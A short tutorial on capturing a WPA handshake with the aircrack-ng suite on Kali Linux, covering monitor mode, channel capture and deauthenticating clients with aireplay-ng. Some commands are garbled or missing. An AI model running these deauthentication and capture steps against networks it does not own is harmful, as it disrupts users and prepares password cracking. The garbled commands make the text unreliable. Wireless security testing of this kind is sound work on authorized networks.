Start monitor mode
Boot up Kali Linux. Go to the terminal to begin running the aircrack-ng tool suite. Put your wifi adapter into monitor mode.
airmon-ng start wlan0
Where wlan0 is the name of your interface card. Check this by running,
When connected to a wireless network. There may be processes interfering in this starting. The program will inform you if there might be issues. Or run,
airmon-ng check kill
Start monitoring the frequencies
Start monitoring the radio frequencies around you by running,
Where wlan1mon is your renamed wifi adapter. Check this again by running,
Select a channel
Select a channel, your own or someone else’s if you have permission,
airodump—ng -c [channel] –bssid [mac-address of intereface] wlan0mon -w [newFile]
Insert your chosen channel and MAC into the bracketed text. You will be saving the log for later analysis using the -w option. Insert the file name you would like to choose into the bracket text of newFile. Your current file location you started terminal in will be the location these files will be saved in.
Disconnect all clients
Now to check to see if your can disconnect clients, forcing them to re-authenticate.
aireplay-ng -0 0 -a [bssid] wlan0mon
Insert the MAC address of the broadcasting interface again. The beacons indicator will drop to 0, try to increase and then drop again. You will be looking for the message in the top right corner,
WPA handshake: 12:34:56:78:90:AB
Not successful? Sometimes it depends on the clients connected. Or, you may need to disconnect a specific client. In that case issue,
aireplay-ng – 0 0 -a [bssid] -c [mac-target address] wlan0mon -w [newFile]
You should now have a .cap file containing the hashed four way handshake. The next article will discuss using the aircrack-ng suite again to see if it can be cracked.